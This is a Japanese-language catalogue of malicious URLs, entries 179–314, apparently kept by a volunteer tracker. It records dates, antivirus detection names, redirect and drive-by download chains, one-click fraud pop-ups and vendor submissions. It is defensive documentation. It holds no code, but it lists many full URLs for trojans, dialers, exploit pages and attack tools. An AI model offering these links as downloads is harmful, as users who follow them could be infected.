  179. http://advnt01.com/dialer/internazionale_ver12.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  180. http://advnt01.com/dialer/internazionale_ver15.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  181. http://advnt01.com/dialer/mexico_ver15.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  182. http://advnt03.com/dialer/internazionale_ver11.CAB
    [2006/07/11]ウィルス名:TROJ_ADPOWER.D


  183. http://advnt01.com/dialer/mex_ver32b.CAB
    [2006/08/01]2006/07/21 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
    2006/07/26 に返事があり、それは以下。
    「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」
    2006/07/26 の時点ではバスター無反応であった。
    しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。


  184. http://afris.biz/e.html
    [2005/08/16]踏むと こんな表示 をし、すぐに//afris.biz/sex.htmlに飛んで、ウィルス名:TROJ_ANICMOO.Fを検出。


  185. http://afris.biz/first/
    [2005/06/16]ウィルス名:JAVA_BYTEVER.A
    APPLETタグで /classload.jar を実行しようとし、実行後は /xpehbamnow.exe を落としてくる。
    IE最新バッチなら未実行で終わる。


  186. http://afris.biz/first/1/ass.html
    [2005/08/16]ウィルス名:HTML_REDIR.AI


  187. http://afris.biz/first/a0/
    [2005/08/16]ウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A
    //afris.biz/first/1/ass.htmlに飛ぶ。


  188. http://afris.biz/first/a0/BlackBox.class
  189. http://afris.biz/first/classload.jar
  190. http://afris.biz/first/GetAccess.class
    [2005/06/16]ウィルス名:JAVA_BYTEVER.A


  191. http://afris.biz/first/xpehbamnow.exe
    [2005/06/16]ウィルス名:TROJ_SMALL.AGP


  192. http://afris.biz/new.html
    [2005/08/16]ウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A+TROJ_ANICMOO.F
    IFRAMEタグで以下の4つのURLを呼び出す。それぞれのURL解説を参照。
    //afris.biz/e.html
    //afris.biz/first/a0/
    //afris.biz/first/
    //afris.biz/first/1/ass.html


  193. http://afris.biz/poc/sp4.html
    [2005/12/29]踏むといきなりウィルス名:JS_IFRAMEBO.E+JS_WINDEXP.A+JS_ONLOADXPLT.A を検出。
    こんな感じ のページだが、これ を4枚立て続けに表示する。


  194. http://afris.biz/sex.ani
  195. http://afris.biz/sex.html
    [2005/08/16]ウィルス名:TROJ_ANICMOO.F


  196. http://agostino.biz/classload.jar
    [2005/07/02]ウィルス名:JAVA_BYTEVER.A


  197. http://agostino.biz/indexie.html
    [2005/07/02]ウィルス名:JAVA_BYTEVER.A を検出し、//agostino.biz/index2.htmll に変わり、その後、アドレスは「res:///」に変わる。
    //agostino.biz/index2.htmll ← 「 html 」では無く、「 htmll 」である。
    セキュリティ環境により、//agostino.biz/server.exe を仕込まされる場合あり。


  198. http://agostino.biz/server.exe
    [2005/07/02]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → TR/HideWindows.A.1, TR/Inor.1, TR/Inor.5, BDS/Mox.16, BDS/Zcrew.13
    ArcaVir → Trojan.Mirc-based
    Avast → Win32:Trojano-756
    AVG → HideWindow, IRC/BackDoor.Flood
    BitDefender → Trojan.Flood.22016, Trojan.HideWindows.A, Exploit.IIS.WebDir, Backdoor.IRC.Mox, BehavesLike:Trojan.Downloader
    Dr.Web → Trojan.Flood.22016, BackDoor.IRC.based, IRC.Generic.69
    F-Prot → W32/Hidewnd.component, IRC/AftpX.A, IRC/Flood.Y
    Kaspersky → not-a-virus:Tool.Win32.HideWindows, not-a-virus:Client-IRC.Win32.mIRC.82
    NOD32 → IRC/Mox.A, probably a variant of IRC/Bnc.G , probably a variant of IRC/Bnc.L , probably a variant of IRC/Zcrew.O
    VBA32 → RiskWare.Tool.HideWindows, Trojan.Dropper.Small.12


  199. http://agriturismovillavittoria.it/pornivideo03y45i.exe
    [2008/12/20]ウィルス名:TROJ_EXCHANGE.EE


  200. http://aguapura.web.pt/
    [2008/11/25]こんな感じ のサイトだが、ウィルス名:MAL_HIFRM を検出。


  201. http://ahyahyauhyahya.zero-yen.com/10000000000000000000000000.html
    [2004/08/13]無限JavaScriptの可能性。


  202. http://ai-takahashi.dnsalias.net/ailove/RD.PHP?get=ailove0015.zip
    [2005/10/13]ウイルス名:W32.HLLW.Antinny [ ノートン ]
    ウィルス名:WORM_ANTINNY.A [ ウィルスバスター ]
    そのzip内に入っているEXE(名前:紺野あさ美2nd写真集『なつふく』.exe)にワーム系ウィルスが仕込まれている。EXE を発動しない限り感染はしない。
    その他に画像96枚あるが、すべて「オラヲタ写真集買え」と書かれた画像。


  203. http://aicsolucoes.com/play.exe
  204. http://aicsolucoes.com/vid.exe
    [2008/10/19]ウィルス名:TROJ_AGENT.AWRZ


  205. http://aika.page.ne.jp/byra8aw7gr/check.exe
    [2006/06/17]バスター無反応だが、以下のアンチウィルスソフトで反応。ワンクリサイト関連の exe と思われる。
    AntiVir → Trojan/PSW.Kapod.P.49
    ClamAV → Trojan.Kapod-25
    Kaspersky → Trojan-PSW.Win32.Kapod.p
    NOD32 → a variant of Win32/Tsipe
    exeを実行すると「ご入会ありがとうございます。お客様の情報をIP=***.***.***.***で登録しました。只今から72時間以内にご入金くださいますようお願いいたします。」という小さなウィンドウを表示。
    そのウィンドウの「OK」を押すと、「振込が確認できておりません。大至急お支払い下さい。」というウィンドウが出て以下の文を表示。
    「サイト利用されたにも関わらず、支払期限を過ぎても入金が確認出来ない場合は「お客様情報」を元にプロバイダに対して 法的な手段を経て、情報開示を求めます。ログを元に自宅や勤務先へ直接請求させて頂く可能性がございます。その際に当番組管理部より延滞料金 \30,000、延滞1日に付き1,000円の損害金を加算して請求されることがありますので期日の方、お忘れないようにお願い致します。」
    また、リモホ情報も別ウィンドウで表示して、カネを払え、と言ってくる。その内容は以下。
    ご利用期間 「90日間」
    ご利用料金 「\69,825」→「\44,000」(2日以内限定)
    [2006/07/25]2006/07/14 にトレンドマイクロ社にファイルを提出。
    2006/07/18 に返事があり、ウィルス名:TSPY_KAPOD.CF として対応」とのこと。
    しかし、実際にDLしてみると、バスター無反応であったので、トレンドマイクロ社に再調査依頼。
    今日、返事があり、ウイルスパターンファイル「3.587.00」よりウィルス名:TSPY_KAPOD.P」として検出するよう対応とのこと。
    しかし、実際にDLしてもバスター無反応であった。恐らく、随時、新しいファイルに置き換えられるURLと推測される。
    [2006/08/03]今日、再度、トレンドマイクロ社から連絡があり、「ウイルスパターンファイル 3.607.00 にてウィルス名:TSPY_KAPOD.CH を検出することを確認」とのこと。
    確認すると、2006/07/25 にDLしたファイルからウィルス名:TSPY_KAPOD.CH を検出。しかし、当該URLは現在、「403 Forbidden」になっている。


  206. http://aikokuseigijuku.com/attack_tools/Blast20.zip
    [2005/04/15]DLして解凍すると、2枚のtxtと「Blast.exe」なるものが入っている。
    バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
    AntiVir → ウィルス名:PMS/Blast.Tool possible malicious software
    mks_vir → ウィルス名:Trojan.Exploit.Blast


  207. http://aikokuseigijuku.com/attackwares/brutusa2.exe
    [2005/04/15]ウィルス名:HKTL_BRUTUS.A 。DOS攻撃ツールらしい。


  208. http://aikokuseigijuku.com/attackwares/fortune.exe
    [2005/05/03]ウィルス名:TROJ_FDOSFORT.A


  209. http://aimeblog.com/eabox/blog_281/
    [2009/08/14]こんな感じ のサイトだが、ウィルス名:JS_DLOADER.BD を検出。
    [2009/11/04]再確認。こんな感じ のサイト。
    ウィルス名:EXPL_ANICMOO.GEN+JS_AGENT.AKFL+TROJ_ANIFILE.F を検出。
    このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。


  210. http://aimeblog.com/rosolo/index-php/
    [2009/04/18]こんな感じ のサイトだが、ウィルス名:JS_AGENT.AKFE+EXPL_EXECOD.A+JS_AGENT.AKFL+EXPL_ANICMOO.GEN+JS_DLOAD.MD を検出。


  211. http://aimeblog.com/rs/lancer/
  212. http://aimeblog.com/rs/lancer/index.htm
    [2009/05/06]こんな感じ のサイトだが、ウィルス名:JS_AGENT.AKFE を検出。
    リロードを繰り返すサイトで、その度にウィルスを検出する。


  213. http://aimeblog.com/ryojiarado/
    [2009/11/04]こんな感じ のサイト。
    ウィルス名:EXPL_ANICMOO.GEN+JS_AGENT.AKFL+EXPL_EXECOD.A を検出。
    このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。


  214. http://aimeblog.com/yuka0816/
    [2010/05/10]こんな感じ のサイト。バスター無反応だったが、中国系URLを呼び出している形跡を確認。
    その中国系URLが確認時にたまたま無害だったため、反応しなかったかもしれない。が、要注意。
    [2010/05/10]他の方の結果では、「 Trojan.JS.Agent.bhm (Kaspersky) を検知しました。」


  215. http://aimeblog.com/yuka225/
    [2009/11/04]こんな感じ のサイト。
    ウィルス名:EXPL_ANICMOO.GEN+JS_DLOADER.BD+TROJ_ANIFILE.F を検出。
    このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。


  216. http://aiongamemeca.com/mavideo/
    [2009/01/14]真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
    何かを呼び出している。少し経って「about:blank」になる。


  217. http://aiongamemeca.com/mavideo/ani.c
    [2009/01/14]ウィルス名:EXPL_ANICMOO.GEN


  218. http://aiongamemeca.com/mavideo/index.htm
    [2009/01/14]真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
    何かを呼び出している。少し経って「about:blank」になる。


  219. http://aiongamemeca.com/mavideo/xia.exe
    [2009/01/14]ウィルス名:PAK_GENERIC.001


  220. http://aiongamemeca.com/mavideo/Xunlei.htm
    [2009/01/14]真っ白なページだが、ウィルス名:JS_DLOAD.MD を検出。


  221. http://aiongamemeca.com/mavideo/Yahoo.htm
    [2009/01/14]真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。


  222. http://aisal.ru/videoPorn218hdy.exe
    [2008/12/20]ウィルス名:TROJ_DLOADER.LPQ


  223. http://ajaxfutebolclube.com.br/up/Flash-Player-Br2008.exe
  224. http://ajaxfutebolclube.com.br/up/Video-watch155ZHyi.exe
  225. http://ajaxfutebolclube.com.br/up/w.exe
    [2008/11/25]ウィルス名:MAL_BANKER


  226. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/2.1.50.8/SmileyCentralPFSetup2.1.50.8.exe
    [2007/05/20]2007/02/19 にトレンドマイクロ社にファイルを提出。
    2007/02/21 にその結果の連絡があり、ウィルス名:ADW_MYWEBSEARC.O として検出するよう対応、とのこと。
    しかし、今日改めて当該URLからDLしてみるとウィルス名:ADWARE_MYWEBSEARCH を検出する。


  227. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/2.3.50.22/PopularScreensaversSetup2.3.50.22.ZRfox000.exe
    [2008/10/14]バスター無反応だが、Kaspersky で not-a-virus:AdTool.Win32.MyWebSearch.cw を検出するらしい。


  228. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei/CursorManiaFWBInitialSetup1.0.0.15.cab
    [2006/08/25]2006/08/19 にトレンドマイクロ社にDL+解凍して現れた「f3Setup1.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_FUNWEB.B として検出するよう対応した、とのこと。
    2006/08/19 にDLしたファイルからウィルス名:ADW_FUNWEB.B を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FUNWEB.B を検出することを確認。


  229. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei/MyFunCardsFWBInitialSetup1.0.0.15.cab
    [2006/08/25]2006/08/19 にトレンドマイクロ社にDL+解凍して現れた「f3Setup1.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_FUNWEB.B として検出するよう対応した、とのこと。
    2006/08/19 にDLしたファイルからウィルス名:ADW_FUNWEB.B を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FUNWEB.B を検出することを確認。


  230. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei/PopularScreenSaversFWBInitialSetup1.0.0.15.cab
  231. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei/SmileyCentralFWBInitialSetup1.0.0.15.cab
  232. http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei/ZwinkyInitialSetup1.0.0.15.cab
    [2006/10/21]ウィルス名:ADW_FUNWEB.B


  233. http://ak.imgfarm.com/images/nocache/funwebproducts/2.0.4.0/CursorManiaFFSetup2.0.4.0.exe
    [2006/01/03]バスター無反応だが、以下のアンチウィルスソフトで反応。
    ブラウザ:FireFox を狙ったカスタマイズ用の偽装アプリケーションらしい。
    AntiVir → Adware-Spyware/ToolBar.MyWebSearch.24 adware
    BitDefender → Trojan.Muldrop.1326.R
    ClamAV → Adware.Mywebsearch-4
    Dr.Web → Trojan.MulDrop.1326
    Fortinet → Adware/MyWebSearch
    Kaspersky → not-a-virus:AdWare.Win32.MyWebSearch
    NOD32 → Win32/Adware.AdInstaller application
    Norman Virus Control → W32/MyWebSearch.AY
    UNA → Adware.MyWebSearch
    VBA32 → AdWare.ToolBar.MyWebSearch
    [2007/03/11]再確認。ウィルス名:ADWARE_MYWEBSEARCH


  234. http://ak.imgfarm.com/images/nocache/funwebproducts/CursorManiaInitialSetup1.0.0.6.cab
    [2006/01/09]DL+解凍すると「f3Setup1.exe」なるファイルが現れる。
    バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → Adware-Spyware/MyWebSearch adware
    ArcaVir → Trojan.Funweb
    ClamAV → Trojan.Dropper.Funweb.A
    Dr.Web → Adware.MySearch
    Kaspersky → not-a-virus:Downloader.Win32.FunWeb
    NOD32 → a variant of Win32/Adware.AdInstaller application
    UNA → TrojanDownloader.Win32.FunWeb
    VBA32 → RiskWare.Downloader.FunWeb


  235. http://ak.imgfarm.com/images/nocache/funwebproducts/ei/MyWebSearchInitialSetup1.0.0.8-2.cab
    [2008/12/17]DL+解凍して現れた「f3Setup1.exe」にはバスター無反応だが、いくつかのアンチウィルスソフトで反応。
    この「f3Setup1.exe」をトレンドマイクロ社に提出。しかし、「不正なコードを含まない正常なファイル」という返事をもらった。


  236. http://ak.imgfarm.com/images/nocache/funwebproducts/ei/SmileyCentralFWBInitialSetup1.0.0.8.exe
    [2007/03/07]2006/10/08 にトレンドマイクロ社にファイルを提出。
    2006/10/13 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2006/10/08 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2006/10/08 から今日まではファイルは置き換えられていないと推測される。


  237. http://ak.imgfarm.com/images/nocache/funwebproducts/ei/SmileyCentralInitialSetup1.0.0.8.cab
  238. http://ak.imgfarm.com/images/nocache/funwebproducts/ei-2/SmileyCentralFWBInitialSetup1.0.0.8-2.cab
    [2006/08/03]DL+解凍して現れた「f3Setup1.exe」にはバスター無反応だが、いくつかのアンチウィルスソフトで反応。
    この「f3Setup1.exe」をトレンドマイクロ社に提出。しかし、トレンドマイクロ社では「不正なコードを含まない正常なファイル」という返事をもらった。


  239. http://ak.imgfarm.com/images/nocache/mysearch/s4initialsetup1.0.0.7.cab
    [2006/08/27]ウィルス名:ADW_MYSEARCH.100


  240. http://akamai.downloadv3.com/binaries/EGDAccess/EGDACCESS_1058_XP.cab
    [2007/04/28]ウィルス名:TROJ_GENERIC


  241. http://akamai.downloadv3.com/binaries/EGDAccess/EGDACCESS_1064_ASPIV4_XP.cab
    [2006/11/24]ウィルス名:DIAL_EGROUP.BA


  242. http://akamai.downloadv3.com/binaries/EGDAccess/EGDACCESS_1064_XP.cab
    [2006/11/24]ウィルス名:DIAL_ACCESS.AF


  243. http://akamai.downloadv3.com/binaries/IA/dtc32_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AI


  244. http://akamai.downloadv3.com/binaries/IA/dtc32_ES.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AH


  245. http://akamai.downloadv3.com/binaries/IA/dtc32_FR_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AI


  246. http://akamai.downloadv3.com/binaries/IA/ia.cab
    [2005/10/11]ウィルス名:DIAL_TRSTWIN.A


  247. http://akamai.downloadv3.com/binaries/IA/ia_XP.cab
    [2005/03/07]ウィルス名:TROJ_WINTRIM.W


  248. http://akamai.downloadv3.com/binaries/IA/nethv32_EN.cab
    [2005/03/28]ウィルス名:TROJ_WINTRIM.DLL


  249. http://akamai.downloadv3.com/binaries/IA/netslv32_EN.cab
    [2005/03/28]ウィルス名:DIAL_NCCDIALER.A
    [2005/10/11]再確認。ウィルスファイルが置き換えられているかも。ウィルス名:TROJ_WINTRIM.DLL


  250. http://akamai.downloadv3.com/binaries/IA/nethv32_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_DIALER.FA


  251. http://akamai.downloadv3.com/binaries/IA/nethv32_ES.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.DLL


  252. http://akamai.downloadv3.com/binaries/IA/netia32_EN.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AU


  253. http://akamai.downloadv3.com/binaries/IA/netia32_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_TRILON.B


  254. http://akamai.downloadv3.com/binaries/IA/netia32_ES.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AU


  255. http://akamai.downloadv3.com/binaries/IA/netia32_FR_XP.cab
    [2005/10/11]ウィルス名:TROJ_TRILON.B


  256. http://akamai.downloadv3.com/binaries/IA/netpe32_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.BB


  257. http://akamai.downloadv3.com/binaries/IA/svcsysnet32_FR.cab
    [2006/11/24]ウィルス名:DIAL_EGROUP.A


  258. http://akamai.downloadv3.com/binaries/IA/sysnetsvc32_EN_XP.cab
    [2007/04/28]ウィルス名:TROJ_GENERIC


  259. http://akamai.downloadv3.com/binaries/LiveService/LiveService_1_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.BP


  260. http://akamai.downloadv3.com/binaries/LiveService/LiveService_2_EN_XP.cab
    [2005/10/11]ウィルス名:PE_WINTRIM.BO


  261. http://akamai.downloadv3.com/binaries/LiveService/LiveService_3_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.AX


  262. http://akamai.downloadv3.com/binaries/LiveService/LiveService_4_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.BK


  263. http://akamai.downloadv3.com/binaries/LiveService/LiveService_5_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.BY


  264. http://akamai.downloadv3.com/binaries/LiveService/LiveService_7_EN_XP.cab
    [2005/10/11]ウィルス名:TROJ_PY.A


  265. http://akamai.downloadv3.com/binaries/one2one/one2oneSvcEN.cab
  266. http://akamai.downloadv3.com/binaries/one2one/one2oneSvcFR.cab
    [2005/10/11]ウィルス名:TROJ_WINTRIM.BJ


  267. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1028_EN_XP.cab
    [2005/10/11]ウィルス名:DIAL_INSACCESS.A


  268. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1041_EN_XP.cab
    [2007/04/28]ウィルス名:TROJ_P2E.AL


  269. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1042_EN_XP.cab
    [2007/04/28]ウィルス名:TROJ_GENERIC


  270. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1043_EN_XP.cab
    [2006/11/24]ウィルス名:TROJ_AGENT.EHZ


  271. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1044_EN_XP.cab
  272. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1045_EN_XP.cab
    [2007/04/28]ウィルス名:TROJ_GENERIC


  273. http://akamai.downloadv3.com/binaries/P2EClient/EGAUTH_1046_EN_XP.cab
    [2007/04/28]ウィルス名:TROJ_P2E.AJ


  274. http://akausagi.com/tensai/ayasii/cgi-bin/ahya.cgi
    [2004/06/24]telnet等を利用したIP抜き。メディアプレーヤーやリアルプレイヤーが強制起動。
    [2004/11/02]タスクマネージャで脱出可。


  275. http://akausagi.com/tensai/sniff.html
    [2004/08/26]IPを抜かれる。「お進みください」は //akausagi.com/tensai/ayasii/cgi-bin/ahya.cgi に飛ぶ。


  276. http://akiko-7.hp.infoseek.co.jp/AdminC/Cyn.zip
    [2005/04/17]ウィルス名:BKDR_CYN.21


  277. http://akujnq.bay.livefilestore.com/y1pyyHtfbYAAMiperkVK0cBP9a5DDWKKFH82T6eZCU7CjuMOSGp1tmCeNXusDQBeV_610Hy0Fl0VsZjbvzc-2t2ww
    [2008/12/17]拡張子不明のファイルが落ちてくる。ウィルス名:TROJ_VNCKILL.HB として検出対応済。


  278. http://alamohammad.persiangig.com/Virus Maker 2.exe
    [2008/11/26]ウィルス名:TROJ_GENERIC


  279. http://alamohammad.persiangig.com/Virus maker.exe
    [2008/11/26]ウィルス名:TSPY_HAZIF.A


  280. http://alarahomes.com/video.exe
    [2008/10/22]ウィルス名:TROJ_AGENT.ISU


  281. http://alarahomes.com/video1.exe
    [2008/10/22]ウィルス名:TROJ_AGENT.IRR


  282. http://albinoblacksheep.com/flash/open.html
    [2004/08/04]//www.albinoblacksheep.com/flash/open.html と同一。
    [2006/04/14]再確認以下のURLに飛ぶが、ブラクラ発動は無し。確認したキャプ画像は これ
    //www.albinoblacksheep.com/flash/youare.php


  283. http://albinoblacksheep.com/flash/you.html
    [2005/03/05]ブラクラ:「 You are an idiot ! 」。
    バスター無反応だが、他アンチウィルスソフト+環境により、ウイルス名:js_milala.a が検出されるらしい。
    [2006/04/14]再確認以下のURLに飛ぶが、ブラクラ発動は無し。確認したキャプ画像は これ
    //www.albinoblacksheep.com/flash/youare.php


  284. http://albumbloglinda.hotmail.ru/album.exe
    [2008/11/10]ウィルス名:TROJ_DLOADE.DF


  285. http://alcaphone.com.br/hot_video.exe
    [2008/11/26]ウィルス名:TROJ_DLOAD.DR


  286. http://alexa69.com/
    [2005/09/12]ウィルス名:JAVA_BYTEVER.A
    [2006/04/14]再確認。海外アダルトページに変更されている。キャプ画像は割愛。
    バスター無反応で、怪しい挙動は確認出来なかった。


  287. http://alfatrade.com.br/img/img_center_home/video-nude-anjelia.avi.exe
    [2008/09/21]2重拡張子。ウィルス名:TROJ_AGENT.AULZ


  288. http://alink.uic.to/user/dyueru.html
    [2005/05/06]無限ループ。


  289. http://alink.uic.to/user/mp3net.html
    [2005/10/22]無限ウィンドウオープン。「about:blank」画面が無限に開くブラクラ。
    親元のタスクを強制終了で脱出可。数日前までは無害だったらしい。
    [2005/10/30]再確認。踏むと「Ψ真・MP3倉庫Ψ」という名のサイト。これが、5枚表示され、それぞれ読み込む。そして、読み込み終わると「about:blank」のブラクラが発動。親元のタスクの強制終了で脱出。


  290. http://all4free.galleryhousing.com/set01/gallery06/page_05.htm
  291. http://all4free.galleryhousing.com/set01/gallery06/page_09.htm
    [2004/10/26]踏むとウィルス名:HTML_RIDER.A+JAVA_BYTEVER.A-1 を検出。
    もう一回踏むとウィルス名:HTML_RIDER.A のみ。更にもう一回踏むとウィルス未検出。
    稀にサムネイル画像のどれか1枚が広告になっている場合がある。


  292. http://allcount.net/lo/12.anr
    [2005/09/16]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → Exploit/MS05-002.Ani.A
    BitDefender → Exploit.Win32.MS05-002.Gen
    ClamAV → Exploit.W32.MS05-002
    Dr.Web → Exploit.ANIFile
    Kaspersky → Trojan-Downloader.Win32.Ani.c
    NOD32 → Win32/TrojanDownloader.Ani.gen
    VBA32 → Trojan-Downloader.Win32.Ani.c


  293. http://allcount.net/lo/12.exe
    [2005/09/16]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → Trojan/Dldr.Small.agq.4
    BitDefender → Trojan.Small.ALX
    Fortinet → BDoor.AZV-bdr
    NOD32 → a variant of Win32/TrojanDownloader.Small.AWA
    VBA32 → Trojan.Downloader.Small.1


  294. http://allcount.net/lo/count.jar
    [2005/09/16]ウィルス名:JAVA_BYTEVER.A


  295. http://allcount.net/lo/x12.php
    [2005/09/16]踏むと こんな感じ 。以下の3つのURLと関連している。
    //allcount.net/lo/12.anr ← バスター無反応だが、他アンチウィルスソフトで反応。
    //allcount.net/lo/count.jar ← ウィルス名:JAVA_BYTEVER.A
    //allcount.net/lo/12.exe ← バスター無反応だが、他アンチウィルスソフトで反応。


  296. http://alley.ten.com/sexconnection/gid/dialer_activex.cab
    [2006/08/29]2006/08/08 にトレンドマイクロ社にDL+解凍して現れた「dialer_activex.ocx」ファイルを提出。
    未だにトレンドマイクロ社から結果の連絡は無いが、ウィルス名:DIAL_PORNDIAL.LL として対応してくれた模様。
    2006/08/08 にDLしたファイルからウィルス名:DIAL_PORNDIAL.LL を検出することを確認。
    しかし、今日改めて当該URLを見てみると404であった。


  297. http://allfor1.info/free/
    [2005/03/06]何回か確認してみると、URLはこれだが、表示される画面が毎回違う。
    しかし、確認した画面全てにおいてウィルス名:JAVA_BYTEVER.A を検出。


  298. http://allgames.gamesh.com/srw/down/music.htm
    [2005/10/16]他の方の鑑定結果は以下の「」内。
    「表示してからしばらくしたら、ActiveX のインストールを促されます。内容は中国語なのでわかんないです。
    サイト自体は中華系のサイトですが、中身は日本語でスーパーロボット大戦のOPとEDのタイトルと歌詞が置いてました。
    歌詞の部分をクリックすると普通に日本語で表示(別窓)。
    無害かとは思われますが、最新版でブロック機能のついたブラウザの使用を推奨。ウィルス・SPY系の反応はありませんでした。」
    [2005/10/16]踏むと こんな感じ のサイト。
    表示してから暫らく経つとウィルス名:ADW_IEBAR.A を検出すると同時に このダイアログ を表示する。


  299. http://allstateautoinsurancecancelled.blog.com/
    [2008/11/22]偽装ウィルス駆除ソフトのページに飛ぶ。


  300. http://allteenmodel.com/
    [2005/03/12]海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A を検出。
    これは //69.50.191.68/eb/be/count.html を読み込むため。


  301. http://allteenmodel.com/#/lolitas/picture18.info.jpg
    [2005/07/23]ウィルス名:JAVA_BYTEVER.A
    [2005/10/27]再確認。//allteenmodel.com/ のトップページに飛ぶが、サーバーが見当たらず、「ページを表示できません」となる。


  302. http://allteenmodel.com/?18yofuck.info
    [2005/07/15]ウィルス名:JAVA_BYTEVER.A


  303. http://allteenmodel.com/?galview.net
    [2005/07/01]ウィルス名:JAVA_BYTEVER.A


  304. http://allways.drusearch.com//traf//458//index.chm
    [2005/04/22]「index.chm」という名のコンパイル済み HTML ヘルプファイルが落ちてくる。このファイルからウィルス名:CHM_PSYME.ASを検出。


  305. http://allways.drusearch.com/traf/458/ex2.htm
    [2005/04/22]環境により、//allways.drusearch.com/traf/458/load.exe を OBJECT 実行させられる。


  306. http://allways.drusearch.com/traf/458/in.html
    [2005/03/18]ウィルス名:MHTMLRedir.Exploit
    [2005/04/22]次の3つのURLと関連している。OBJECT実行で @ を、IFRAME呼び出しで A と B をそれぞれ実行される。
    @、//allways.drusearch.com//traf//458//index.chm
    A、//allways.drusearch.com/traf/458/ex2.htm
    B、//allways.drusearch.com/traf/458/test.php
    上記で、B は真っ白なページで無害。@ と A はそれぞれのURL解説を参照。


  307. http://allways.drusearch.com/traf/458/load.exe
    [2005/04/22]バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
    AntiVir → ウィルス名:TR/Dldr.Small.aln.3
    AVG → ウィルス名:Downloader.Small.28.E
    BitDefender → ウィルス名:Trojan.Downloader.Small.ALN
    Dr.Web → ウィルス名:Trojan.DownLoader.2243
    Kaspersky → ウィルス名:Trojan-Downloader.Win32.Small.aln
    mks_vir → ウィルス名:Trojan.Downloader.Small.Aln
    NOD32 → ウィルス名:Win32/TrojanDownloader.Small.NCF
    Norman Virus Control → ウィルス名:W32/DLoader.CPY
    VBA32 → ウィルス名:Trojan-Downloader.Win32.Small.aln


  308. http://allways.drusearch.com/traf/11313/in.html
    [2005/01/12]ウィルス名:EXPL_SHEXPLOIT.A


  309. http://aloni.memebot.com/czilbotadv.exe
    [2008/10/23]ウィルス名:HKTL_HIDEWIND.AA


  310. http://aloni.memebot.com/ddt.exe
    [2008/11/08]バスター無反応だが、以下の多くのウィルス駆除ソフトで反応。
    AhnLab-V3 → Win-Trojan/Bbsxp.899439
    Avast → Win32:Trojan-gen {Other}
    AVG → HackTool.AD
    CAT-QuickHeal → Hacktool.Perl.BBSXP.b (Not a Virus)
    ClamAV → Hacktool.Webdav-8
    DrWeb → Tool.Flooder
    eTrust-Vet → Win32/IRCFlood
    F-Secure → HackTool.Perl.BBSXP.b
    GData → Win32:Trojan-gen {Other}
    Ikarus → DoS.Perl.BBDoS.c
    K7AntiVirus → HackTool.Perl.BBSXP.b
    Kaspersky → HackTool.Perl.BBSXP.b
    Symantec → Hacktool
    ViRobot → Toolkit.Win32.BBSXP.899439
    2008/10/27 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、「弊社では正常ファイルとして判断したファイルであり、対応は行わない。」とのこと。


  311. http://aloni.memebot.com/ftp.exe
    [2008/10/23]ウィルス名:BKDR_SERVU.I


  312. http://aloni.memebot.com/IpcScan.exe
    [2008/10/23]ウィルス名:PE_GENERIC


  313. http://aloni.memebot.com/psexec.exe
    [2008/10/23]ウィルス名:TSPY_DROPPER


  314. http://aloni.memebot.com/psy.exe
    [2008/10/23]ウィルス名:TROJ_MALOGT.A


